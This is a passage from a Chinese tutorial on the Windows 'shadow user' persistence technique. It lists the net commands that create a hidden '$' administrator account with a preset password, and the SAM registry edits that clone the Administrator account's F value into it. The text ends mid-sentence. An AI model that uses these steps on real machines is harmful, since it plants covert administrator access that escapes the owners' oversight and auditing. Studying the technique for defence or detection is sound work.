Windows影子用户(Windows权限维持)
- Windows影子用户
-
-
- 1.首先需要拥有Administrator权限创建一个用户,并分配管理员权限。
- 2.我们切换用户到test$用户下
- 3.接着在注册表`HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names` 找到我们创建的用户,与其默认类型。(在上面修改过后,如果没有,就需要刷新注册表才能看到)
- 4.接着导出我们想要复制的账户,例如管理员账户对应的为`0x1f4`,所以我们导出对应的注册表`000001F4` 为`3.reg`
- 5.用`txt文本`打开`2.reg`和`3.reg`,因为我们想要复制`Administrator`用户,所以我们将`3.reg`(`Administrator用户`的注册表)中的F值,复制粘贴替换掉`2.reg`中的F值
- 7.此时我们再切换用户登录到`test$ 用户`输入创建的密码就可以进入被复制到的账户的页面。
-
Windows影子用户
1.首先需要拥有Administrator权限创建一个用户,并分配管理员权限。
net user test$ test123 /add
net localgroup administrators test$ /add
net localgroup users test$ /del
三条指令:
-
创建隐藏用户test
-
将test用户添加到Administrators组中
-
将test用户移出users组中。
我们通过加上$
符号,使得net us